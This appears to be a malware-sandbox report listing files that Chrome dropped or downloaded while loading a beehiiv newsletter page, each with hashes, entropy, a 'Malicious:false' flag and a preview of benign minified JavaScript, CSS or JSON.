                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="18ae0835-3e40-5dd2-815b-3c111c4bd39c")}catch(e){}}();.import{j as e}from"./jsx-runtime-BjG_zV1W.js";import{c as s}from"./index-x2da_zcv.js";import{d as u}from"./dayjs.min-B8CfgAhU.js";import{r as _}from"./relativeTime-tlGPeD3Q.js";import{I as j}from"./Image-ycA_AFLr.js";import{T as m}from"./index-BdpAPpdN.js";import{u as v}from"./useTranslation-CfKJAmGY.js";import{L as y}from"./components-Oj2xMfGE.js";import{F as N}from"./SparklesIcon-DA4hsc2a.js";import{F as z}from"./LockClosedIcon-BluoCUMI.js";const c=({theme:t,text:r,icon:n})=>e.jsxs("div",{className:"relative mb-1 mt-1 inline-flex items-center space-x-1 overflow-hidden rounded-wt px-2 py-1 text-xs",children:[e.jsx("div",{className:s("absolute inset-0",t==="light"?"bg-wt-primary text-wt-primary opacity-10":"",t==="dark"?"bg-wt
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2528
                                                                                                                                            Entropy (8bit):4.800607923042153
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:k06y8yfygq4l8YFMk8YKY+dfMBJ2feuw6G7qg/BRY92:kny8yfygq4l8YmkJKY+dfMBkZG7qgnYs
                                                                                                                                            MD5:A11C8F3D9236D7D886B329A07FFDF11D
                                                                                                                                            SHA1:3EE2927A0F6DD8CFA59BB49BAD1F9F552D15919F
                                                                                                                                            SHA-256:48EEC5118D01A7F0378C905871255CF7E1BCCC393A23B76FACA61C9AF943E90C
                                                                                                                                            SHA-512:C00CFA76499B773AC108B2DB90C14DF599A5704A3DB55A3EF9EB07B9A58C5BD62B831F1D83750CC5C1B273A0D0DC2E44565940585E9B216CAA9D5AE398954139
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:"use strict";.var EMBED_URL = 'https://embed.bsky.app';.window.bluesky = window.bluesky || {. scan: scan,.};./**. * Listen for messages from the Bluesky embed iframe and adjust the height of. * the iframe accordingly.. */.window.addEventListener('message', function (event) {. if (event.origin !== EMBED_URL) {. return;. }. var id = event.data.id;. if (!id) {. return;. }. var embed = document.querySelector("[data-bluesky-id=\"".concat(id, "\"]"));. if (!embed) {. return;. }. var height = event.data.height;. if (height) {. embed.style.height = "".concat(height, "px");. }.});./**. * Scan the document for all elements with the data-bluesky-aturi attribute,. * and initialize them as Bluesky embeds.. *. * @param element Only scan this specific element @default document @optional. * @returns. */.function scan(node) {. if (node === void 0) { node = document; }. var embeds = node.querySelectorAll('[data-bluesky-uri]');. for
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:JSON data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):31
                                                                                                                                            Entropy (8bit):3.873235826376328
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:YA8rQaC:YAoQaC
                                                                                                                                            MD5:5FC018D9E6C56911BBC8DC5DDCD0C768
                                                                                                                                            SHA1:70979F57A85D527ED8ABCBF02CFF44640C58BDE6
                                                                                                                                            SHA-256:2E6D78A4AE644F3B60AFD3C33E66539FF6C5F6A8ED6ABC40A3AF06AC020EC020
                                                                                                                                            SHA-512:1E3B86274B3590E28366F2D2DE86A1844058E213BD225AAA05D992CA70523F65D2BD543F9F762A805A2C4D5961AA34F5A19EBE70E135939C9CD3C63F6B5F5524
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:{"error":"Method Not Allowed"}.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (370)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1001
                                                                                                                                            Entropy (8bit):5.493947223436579
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:UgqHHVvCaRuS+lViOgNQtcd7uoqIfyAxSKY41MI0TdRB1waAVic:JWkECi5NraAfbxYCMzDPwic
                                                                                                                                            MD5:53D7C93E82FE6FE31FCC39AA759E13D1
                                                                                                                                            SHA1:C94371B2F5769C4849005AF96979CFAC26BFFC5C
                                                                                                                                            SHA-256:E19ECD46EC0A147D8C2DEA13C75424B35FE2009343445F9E239437AFAF91DD43
                                                                                                                                            SHA-512:63A28DFD8F19BFD9B79830725665E3A5E9191DC1E4A0C6917705F569488DF91E3C018541330A7DD95366A54F22CA393B76C26673A4CCC1C9E9C62187AD43B25D
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="c358fce4-4230-581e-852b-70b869a996bf")}catch(e){}}();.var o={exports:{}},s={};/**. * @license React. * react-jsx-runtime.production.js. *. * Copyright (c) Meta Platforms, Inc. and affiliates.. *. * This source code is licensed under the MIT license found in the. * LICENSE file in the root directory of this source tree.. */var E=Symbol.for("react.transitional.element"),n=Symbol.for("react.fragment");function l(v,r,t){var e=null;if(t!==void 0&&(e=""+t),r.key!==void 0&&(e=""+r.key),"key"in r){t={};for(var x in r)x!=="key"&&(t[x]=r[x])}else t=r;return r=t.ref,{$$typeof:E,type:v,key:e,ref:r!==void 0?r:null,props:t}}s.Fragment=n;s.jsx=l;s.jsxs=l;o.exports=s;var u=o.exports;export{u as j};.//# sourceMappingURL=jsx-runtime-BjG_zV1W.js.map..//# debugId=c358fce4-4230-581e-852b-70b869a996bf
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, Unicode text, UTF-8 text, with very long lines (1067)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):1435
                                                                                                                                            Entropy (8bit):5.595645148206734
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:UgqHHVvCaRuSH7ENY0PFUA+IyjC8FhslPFjyLudv0A+3E0/5lgag6LODALblB:JWkEnENYiFcIyjxhslPFjyKlB+3E0/5d
                                                                                                                                            MD5:3BB0B4F76B4B0B7D38940874E568C407
                                                                                                                                            SHA1:2214C748069DB288C25487D3B0F70AEAA6B35043
                                                                                                                                            SHA-256:03F19EBA847BED4600CE02AB56510117779736340F7370B137F340DB32A8F46E
                                                                                                                                            SHA-512:B2ED1CC415C64CC1BF7D265CF47B5CE4F2AA79B27BFEB3703E9BE72C906C9EA8A2C2D53649D88180B2B1E8436E281809AF62E358321680348A660BB5708714F4
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/assets/context-CxfOs_9L.js
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="e2e231bc-9fe4-5845-8bc0-5c4d667fd386")}catch(e){}}();.import{r as o}from"./index-D6da9p6-.js";const r=/&(?:amp|#38|lt|#60|gt|#62|apos|#39|quot|#34|nbsp|#160|copy|#169|reg|#174|hellip|#8230|#x2F|#47);/g,p={"&amp;":"&","&#38;":"&","&lt;":"<","&#60;":"<","&gt;":">","&#62;":">","&apos;":"'","&#39;":"'","&quot;":'"',"&#34;":'"',"&nbsp;":" ","&#160;":" ","&copy;":".","&#169;":".","&reg;":".","&#174;":".","&hellip;":".","&#8230;":".","&#x2F;":"/","&#47;":"/"},c=e=>p[e],u=e=>e.replace(r,c);let t={bindI18n:"languageChanged",bindI18nStore:"",transEmptyNodeValue:"",transSupportBasicHtmlNodes:!0,transWrapTextNodes:"",transKeepBasicHtmlNodesFor:["br","strong","i","p"],useSuspense:!0,unescape:u};function l(){let e=arguments.length>0&&arguments[0]!==void 0?arguments[0]:{};t={...t,...e}}
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (48838)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):49198
                                                                                                                                            Entropy (8bit):5.291087715982654
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:EPG6uVzd0vve4Fz2eQ8cve+vnRpYmNRUFnXeM1CIm+gk+k+tYAIRL76frULm8elb:EPHWCB0c/GPd0OmiQb+mVO/nZ6K
                                                                                                                                            MD5:DE51BD49E20DF0C40E699BCA79E60062
                                                                                                                                            SHA1:C2C85F4B2AB1A55192A131A74EB23B26F70CAFDC
                                                                                                                                            SHA-256:DC584F6368161181C03FF6873E9DF30D0612A35F678EDFB7D3DAFB7D03D84FEF
                                                                                                                                            SHA-512:8D46C52AA89621AD67064A16ED42620F245B94A5AAE7C5E20B8292B3DBE8F0DC54CE33470C489DCAEF9F4ACFC041F3FB2A40044612B279FF2BDCDAA32285871A
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="1bb1b603-909c-56b5-b33f-cfc8351eacac")}catch(e){}}();.const ue={type:"logger",log(i){this.output("log",i)},warn(i){this.output("warn",i)},error(i){this.output("error",i)},output(i,e){console&&console[i]&&console[i].apply(console,e)}};class U{constructor(e){let t=arguments.length>1&&arguments[1]!==void 0?arguments[1]:{};this.init(e,t)}init(e){let t=arguments.length>1&&arguments[1]!==void 0?arguments[1]:{};this.prefix=t.prefix||"i18next:",this.logger=e||ue,this.options=t,this.debug=t.debug}log(){for(var e=arguments.length,t=new Array(e),s=0;s<e;s++)t[s]=arguments[s];return this.forward(t,"log","",!0)}warn(){for(var e=arguments.length,t=new Array(e),s=0;s<e;s++)t[s]=arguments[s];return this.forward(t,"warn","",!0)}error(){for(var e=arguments.length,t=new Array(e),s=0;s<e;s++)t[s]=ar
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text, with very long lines (1900)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2258
                                                                                                                                            Entropy (8bit):5.245387212575917
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:JWkEfxFN4k/wtdYRAd3d/5q5fUnRNpE787g9Dx39aodue94wqXI:QirP53BAS7+x3co99q4
                                                                                                                                            MD5:E0A9A569F2C27BC249D9061A47F86F53
                                                                                                                                            SHA1:C6BFB3D5781D6904A003A7BE9D90EAE28569039D
                                                                                                                                            SHA-256:6A522907FF0D0700FD1AF0A634FF3AA83983F5AC9552953B1E7FCD62733386A5
                                                                                                                                            SHA-512:A90275A00125DABB138CBC89753BFE5217A3DE55E02C339E02E3E795A66E4A7AEC7DD9AD81FCDEBCEEADA15EF18DF7B54FD3EC7B9773965A18EE2F79D263A593
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="0d2d54d6-3fc9-5f6a-805d-6c801f76c592")}catch(e){}}();.import{j as n}from"./jsx-runtime-BjG_zV1W.js";import{c as y}from"./index-x2da_zcv.js";import{L as u}from"./components-Oj2xMfGE.js";const f="border font-medium shadow-sm wt-button-font inline-flex items-center disabled:bg-gray-400 disabled:cursor-not-allowed focus:outline-none focus:ring-2 focus:ring-offset-2 justify-center transition-colors",m="border-wt-primary text-wt-text-on-primary bg-wt-primary disabled:border-gray-500 focus:ring-wt-primary",l="bg-white hover:bg-gray-100 text-gray-800 border-gray-200 disabled:bg-gray-200 disabled:text-gray-300 focus:ring-wt-secondary",w="border-gray-300 text-gray-700 bg-white shadow-md focus:ring-wt-primary",p="border-red-600 text-white bg-red-600 shadow-md hover:border-red-700 hover:bg-r
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):140565
                                                                                                                                            Entropy (8bit):5.176519358238777
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:o2bNYeAO3xE8MUuHZNUr1AT5NjwfeUbDP0qyUUIV+IhkfBQIDCcYGWJXA323SfBz:o2SevMUulwfeUHU8gIefa5AVfwxmx
                                                                                                                                            MD5:0F4974198E0E7205D9280D588BAEF700
                                                                                                                                            SHA1:9C5AFA934E0CABD8ADF380956863F9EDC873930E
                                                                                                                                            SHA-256:0C4FEFF075C9E15C7B109BC046A765DB30497D3085914D457AA10D91C25F46E0
                                                                                                                                            SHA-512:7F6A3722B9CE8946F7F069CFD6FCF5672C923970459EA3ED5C05175917112DAD87D710FA947E4BB2948A3814DC2206F7F968A4A496D9A009463E132FCDA6EAFA
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/assets/root-DEVPAlsu.css
                                                                                                                                            Preview:*,:before,:after{box-sizing:border-box;border-width:0;border-style:solid;border-color:#e5e7eb}:before,:after{--tw-content: ""}html,:host{line-height:1.5;-webkit-text-size-adjust:100%;-moz-tab-size:4;-o-tab-size:4;tab-size:4;font-family:ui-sans-serif,system-ui,sans-serif,"Apple Color Emoji","Segoe UI Emoji",Segoe UI Symbol,"Noto Color Emoji";font-feature-settings:normal;font-variation-settings:normal;-webkit-tap-highlight-color:transparent}body{margin:0;line-height:inherit}hr{height:0;color:inherit;border-top-width:1px}abbr:where([title]){-webkit-text-decoration:underline dotted;text-decoration:underline dotted}h1,h2,h3,h4,h5,h6{font-size:inherit;font-weight:inherit}a{color:inherit;text-decoration:inherit}b,strong{font-weight:bolder}code,kbd,samp,pre{font-family:ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,Liberation Mono,Courier New,monospace;font-feature-settings:normal;font-variation-settings:normal;font-size:1em}small{font-size:80%}sub,sup{font-size:75%;line-height:0;position:r
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 35682
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):9516
                                                                                                                                            Entropy (8bit):7.968253590340941
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:qzUDtqN6wWTHCmT2c4O1EnKsR+tLL+FJwoaTZKSXe+II6XKaooKS7MNoMw:JlwWTimTK1FUtLg2T8/pAor
                                                                                                                                            MD5:8D2B7A9BD4FC7D30AFA511831AD75DDB
                                                                                                                                            SHA1:5C78ECA2F5EA3ACABB4A2462D542159821185850
                                                                                                                                            SHA-256:18B00E2705AA354CCC732FDBD65794F6D79743FAFA771FBD0AF48F4375078BC0
                                                                                                                                            SHA-512:1B588491751B6F2E0B87C13D78294FBCFCAABAF2E715C715CEB2B6BB88DBBA35E7EAF7DD2A0F4EC6DBB358EA8FC21ADBA8F954AA9DF8BADC2DD994C4C5095908
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:...........}.s.6....W.;.tB+..TV'.:N.m...N..6....6k........~..R.H.r....i-.....@.....E./m..............k...O.........I....8.x.4..i...&Z.iq..l.f...v.....(K/..\h.,.]."..q^@.P..km..e\;.Yq.}<..a|...gq..Y......E.F..G..C..m.p.i..1;.~.Y..iTh.`"..I.%....5..-....Yq^.1.N...5..3.9...s.0..._@0N......>i2..7...Cx.0hE..K....89.n.....W...|.q..\dW..|...<.$.r.].... ..hg.M...t.8z..q).B....5......"1.5...b!..[9.u..q%...{.&...\...q..g. ...(.....8_.c.^....lNs..].r...O.>.....~*i5..!@..O/i.Ts.7...E...G@....tC.......T....^...i............_......|...o..C.I.L.b5.z.'..+..6M..HO.....|..N.....>.c!......|.#}.=.z...H...j.....KldB...x....v.`..t|Rd ..%|=.4{O.._L..1E..y:).....2.A.@.Oo.B...w.Xv;H....(y....G......k..i4~7........E..9.f...|!2.xz.....X.....@K...`Z.7.w..o*.j....`1Ey...T.........4...>G..WP,.b.#..?C.2......\..5q....1I.....#..4.......p^...l.1.../...j.$...d...,Y..w.|^d.O.....v..<...n._.l....Q"N.K!..=.8(...a.....C.......Oqr..............x...X.o9.<.Jx.+>. .4.......O.1.n..Y..Y..
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (13631)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):44165
                                                                                                                                            Entropy (8bit):5.323504130834923
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:Xd/BoDlgz5HaFsML4jsLaFQp/yykuyRKeKrId+zbTDLu8FM+DUtexy1dz9:5Boz34QLo4yywErId4TDa7t5n
                                                                                                                                            MD5:10AC4CBAFFE65F0BFB5D561749C6DA2D
                                                                                                                                            SHA1:858270EB2C63DF09CB5D1480654D34A3F258A018
                                                                                                                                            SHA-256:2EB96604BD72AB3C21BEB0B13932CD9531354C98C808C775CC37CDB9C80D2800
                                                                                                                                            SHA-512:72D9EF1AFE44E39F3B246BC3D7E3517D6010AA50B6FE51ABCFC948AA47F5335453778A31DF99D435EF18EB9C3143CD6E8C81B42B5DC78F883648F50828C0311C
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="eea4b823-7d77-5133-9b39-28cd235af77e")}catch(e){}}();.import{r as s,g as ft,N as z,h as dt,i as $e,j as F,k as te,a as U,l as mt,m as de,s as j,D as ge,u as Ie,I as ht,R as Fe,n as re,o as pt,p as yt,q as ve,t as xe,v as Me,d as je,w as gt,A as vt,x as St,y as wt,E as Et,z as _t,B as Rt,C as Ue,F as bt,G as xt,H as Tt}from"./index-D6da9p6-.js";function Lt(e,t){for(var r=0;r<t.length;r++){const n=t[r];if(typeof n!="string"&&!Array.isArray(n)){for(const a in n)if(a!=="default"&&!(a in e)){const i=Object.getOwnPropertyDescriptor(n,a);i&&Object.defineProperty(e,a,i.get?i:{enumerable:!0,get:()=>n[a]})}}}return Object.freeze(Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}))}var He={exports:{}},O={};/**. * @license React. * react-dom.production.js. *. * Copyright (c) Meta Pl
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text, with very long lines (1857)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):2215
                                                                                                                                            Entropy (8bit):5.463704007023226
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:JWkER5NHoJ4o0r4v34BZezeY5Ixbm9CbHXLDc:Q5zznra7zeOWbHXLDc
                                                                                                                                            MD5:CD6BE897601E289DC49D164555871748
                                                                                                                                            SHA1:B3B1B2C58529AAD481BD680A24A35DD95517349B
                                                                                                                                            SHA-256:7E164144421C07E16F09F1BBA3BB9D21C483B9AC1E7F647DB3B9C70D5FEBBD1F
                                                                                                                                            SHA-512:5F1F5F1B5DABBBCDE385A6CFC2556D00DC4A5AC95CA50BCA158979385E7678CB7CA66D2E7E2806151A12EA4B07E32D228F0979FC3151445C93F687BA80306D26
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/assets/index-DWIcfCyK.js
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="009071c1-ee74-5ac3-8335-b6fb9e437637")}catch(e){}}();.import{j as s}from"./jsx-runtime-BjG_zV1W.js";import{c as m}from"./index-x2da_zcv.js";import{u,a as g,r as j}from"./index-D6da9p6-.js";import{u as N}from"./useTranslation-CfKJAmGY.js";import{u as y,L as b}from"./components-Oj2xMfGE.js";const k=({isFullWidth:l=!1,inline:n=!1,errorCode:t="404",publicationPresent:o=!0,customTitle:f,customDescription:h,error:e})=>{const{t:a,i18n:c}=N(),p=c.exists(`errors.${t}.title`)?a(`errors.${t}.title`):a("errors.fallback.title"),d=c.exists(`errors.${t}.description`)?a(`errors.${t}.description`):a("errors.fallback.description"),r=u(),{pathname:x}=g(),[i]=y();return j.useEffect(()=>{t==="404"&&!i.has("404")&&r(`/?${new URLSearchParams({404:x})}`)},[t,x,i,r]),s.jsx("div",{className:m("mx-auto fle
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (1493)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1851
                                                                                                                                            Entropy (8bit):5.2892427122782655
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:JWkExNTu5K0n8JXXckjbfD7YUsBfs4EWO1nnd:Q/u5K0n8JntX73sBELW6d
                                                                                                                                            MD5:FD91096C9A8D69C49E01D5156E3C9805
                                                                                                                                            SHA1:9190FA53C80490D21ABF75C69ED6CCE026800986
                                                                                                                                            SHA-256:87AD36C164297AFFA5938FF569D3D8E13C903E4C373C3EFE52CD492A908F6769
                                                                                                                                            SHA-512:69D45C079358B072FFAAE297161AD3DD3BC1EEF8ACFB49F2FA938FF579425E1D62B5F46BD2D7F1DC75A3D8E3EF74514591808E7F39BFB38A32313BAA7C1984EA
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="bae72ac9-95e5-569f-b736-65af3ae4a791")}catch(e){}}();.const k=["og:title","og:url","og:description","og:description","og:image","og:title","og:image:width","og:image:height","og:image:alt","og:type","og:site_name"],M=["keywords","author","robots","viewport","description","twitter:title","twitter:url","twitter:description","twitter:image","twitter:card","fb:app_id"],A=({canonicalUrl:g,matches:d,overrides:o={},links:c=[],returnEarlyCheck:h=!1,structuredData:p})=>{const n=d.find(t=>t?.id==="root"),i=n?.data?.publication,s=i?.name||o?.title||"",a=i?.description||o?.description||"",w=n?.meta,u=[],y=w?.reduce((t,e)=>{if(e.tagName==="link")return u.push(e),t;const m=Object.keys(e)[0],b=e[m];return t[m]=b,t},{})||{};if(h||!i)return[];const l={...y,title:s,description:a,"og:type":"website
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text, with very long lines (534)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):902
                                                                                                                                            Entropy (8bit):5.485611931534671
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:UgDGH4LOaOvCaBfuS30/wNwLvunX4vT/LZYn7pHy/AYD2qh625eeKA34y/x:UgqHHVvCaRuSRNEunX+187pHyIzq9Km7
                                                                                                                                            MD5:C7642FB9813B7D755EA0FF08DDC5307C
                                                                                                                                            SHA1:1EE96F2DFC60EF202D0DC13ABF78B3072817FE04
                                                                                                                                            SHA-256:4ACEF49D876CF633AAAC5D1A697D36CF3C91F25CE6F3050E231FF26E067187B1
                                                                                                                                            SHA-512:6C2BDBA8C826BE91D0C05C6902149072EEA8C7377EF7962D52DAE0DABE3E3144693C53C88383ED42850E7AEE0758F648DA442EFAF83479C68F42ED3516628617
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="50a94ada-3a0e-505f-b0d6-c38dd53d3543")}catch(e){}}();.import{r as e}from"./index-D6da9p6-.js";function t({title:r,titleId:a,...l},o){return e.createElement("svg",Object.assign({xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24",fill:"currentColor","aria-hidden":"true","data-slot":"icon",ref:o,"aria-labelledby":a},l),r?e.createElement("title",{id:a},r):null,e.createElement("path",{fillRule:"evenodd",d:"M12.53 16.28a.75.75 0 0 1-1.06 0l-7.5-7.5a.75.75 0 0 1 1.06-1.06L12 14.69l6.97-6.97a.75.75 0 1 1 1.06 1.06l-7.5 7.5Z",clipRule:"evenodd"}))}const c=e.forwardRef(t);export{c as F};.//# sourceMappingURL=ChevronDownIcon-CCywpT3m.js.map..//# debugId=50a94ada-3a0e-505f-b0d6-c38dd53d3543.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):40
                                                                                                                                            Entropy (8bit):4.289822782008755
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:mS4V0znYn:mS80rY
                                                                                                                                            MD5:A6FE01021B8B434B2BB58C06B0B6659B
                                                                                                                                            SHA1:C7B37B1F418C6FE5DB4265F7DF39AE3B57BF79A1
                                                                                                                                            SHA-256:D6E56F2DC67C00662FF7BB85C9C2ED2299E6A29943AA3E7FD7FC5C9947BEC13D
                                                                                                                                            SHA-512:A53616911CC88CDF864DEFBB601862E27EBE3FA9C984C0888D5AD04BAF016D205B2CD08D982312EBEE735319DA3761034BCD52F77BBA2AF79BD5D1C45E20443C
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISHgmx1HCB8lnbKhIFDXe3dZoSBQ1QqCqxEgUNg6hbPQ==?alt=proto
                                                                                                                                            Preview:ChsKBw13t3WaGgAKBw1QqCqxGgAKBw2DqFs9GgA=
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (49248)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):82295
                                                                                                                                            Entropy (8bit):5.5815465888366225
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:3k62zBt4GGyeJn//8H5p80HJEg77f+uHky/oHPN97ayteWIYsn78+PDvwM5aunM1:9GGd0LhMvbhJbwCM8AGXAtg
                                                                                                                                            MD5:6732BB8B08AB3B21295DD2471669E6C5
                                                                                                                                            SHA1:56F71F7588BEAB59AAD7553D7BAB5F41550A3D44
                                                                                                                                            SHA-256:1ABBC4EA1BA8C6AFE125C3B2AB74057A37560DB1F4FE6F8BAED1E4E2A097B5B9
                                                                                                                                            SHA-512:F08DC59B3CBD8BE4E4A0560C094F343B8B872986882C3DF30100B32130A35FE96F94EE7DD03B4F09E42D058A39563760C8675E967E5823F66C5DB23E574A1F16
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="89e9c205-7dfb-5d3c-8453-4b4f79b237e1")}catch(e){}}();.import{j as t}from"./jsx-runtime-BjG_zV1W.js";import{T as R}from"./index-BdpAPpdN.js";import{u as Ie,S as U,F as Ve,r as Ke,L as Ze,a as Ge}from"./useSetLastViewedResource-BelRoKi6.js";import{u as M}from"./useTranslation-CfKJAmGY.js";import{r as p,a as ge,u as we,b as X,g as Pe}from"./index-D6da9p6-.js";import{u as qe,C as Je,D as Ye}from"./index-DTtuIjz-.js";import{c as E}from"./index-x2da_zcv.js";import{B as V}from"./index-EzvqLY92.js";import{I as je}from"./Input-snMSpc3o.js";import{S as Z}from"./StatusInputs-JkVhk_jg.js";import{u as ne}from"./useToast-DK42uF07.js";import{c as $,u as Me,d as Fe}from"./components-Oj2xMfGE.js";import{q as A}from"./transition-y-5XFFuu.js";import{M as Xe}from"./index-IxBbnf-Q.js";import{q as P}f
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (18184)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):18549
                                                                                                                                            Entropy (8bit):5.3549096031053525
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:v0hLNbLj27q/yn6huwEhVerExQUrWBrJ+lfps9qAFXbxaA:v0FNz2Ay0uwAVerExQUiBl+lfpstFXFz
                                                                                                                                            MD5:88E602E993D426566FCDDF1657EAD32A
                                                                                                                                            SHA1:52A55FE35DBE7E5E336FD333B09ACE94D2F5DF9C
                                                                                                                                            SHA-256:04EEE52A5C561343A7E0163C9C4707556B44172B80BECFA08B8E064A531BFE85
                                                                                                                                            SHA-512:EEE3F6CFF257705937305A50EF55DFCFD885A3B359A19DAC226FE152A1AAE1C8F5A6FFF628EFC0E137852303468C97BF2393C921A235DFC2CED9A37B2FA3113B
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
